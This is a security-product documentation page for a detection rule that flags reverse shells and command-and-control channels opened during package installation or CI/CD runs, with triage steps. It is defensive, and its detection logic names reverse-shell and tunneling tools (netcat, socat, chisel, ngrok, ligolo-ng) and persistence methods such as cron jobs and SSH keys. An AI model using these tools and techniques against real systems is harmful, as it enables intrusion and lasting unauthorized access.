For AI agents: A markdown version of this page is available at https://docs.datadoghq.com/security/default_rules/def-000-nkf.md. A documentation index is available at /llms.txt.

Supply chain reverse shell

Classification:

attack

Tactic:

TA0011-command-and-control

Technique:

T1195-supply-chain-compromise

What happened

A reverse shell or command-and-control (C2) channel was established during a supply chain operation, such as package installation or CI/CD pipeline execution, on host {{host}}. A process running in the supply chain execution context spawned a shell or established a network tunnel to an attacker-controlled endpoint.

Goal

Detect when a malicious package or compromised CI/CD pipeline step establishes remote access through reverse shells, network tunnels, or C2 channels. This pattern is used by attackers to gain interactive access for lateral movement, privilege escalation, and data exfiltration.

Strategy

This rule correlates three signal categories within package_install_* or cicd_runner_* execution contexts:

  • Reverse shell: Execution of netcat, socat, openssl, Python, or Perl-based reverse shell techniques during package installation or CI/CD execution
  • Network C2: Use of tunneling or lateral movement tools (chisel, ngrok, ligolo-ng), suspicious shell network connections, or IRC connections
  • Persistence: Installation of cron jobs, systemd services, SSH authorized keys, kernel modules, or linker modifications

Persistence is used as a severity amplifier. A reverse shell combined with persistence indicates the attacker is establishing a durable foothold, not just a one-off connection.

Triage and response

  1. Identify the package or CI/CD step that triggered the shell or network activity by examining the correlation key and process tree.
  2. Capture the destination IP/hostname of the reverse shell or C2 connection for IOC tracking.
  3. Terminate the malicious process and kill the reverse shell connection immediately.
  4. Check if persistence mechanisms were installed (cron jobs, systemd units, SSH keys) and remove them.
  5. Investigate whether the attacker performed any lateral movement or accessed additional systems.
  6. Remove the malicious package and audit all systems that installed it.
  7. Block the C2 IP/domain at the network perimeter.
  8. Follow your organization’s incident response process for active intrusions.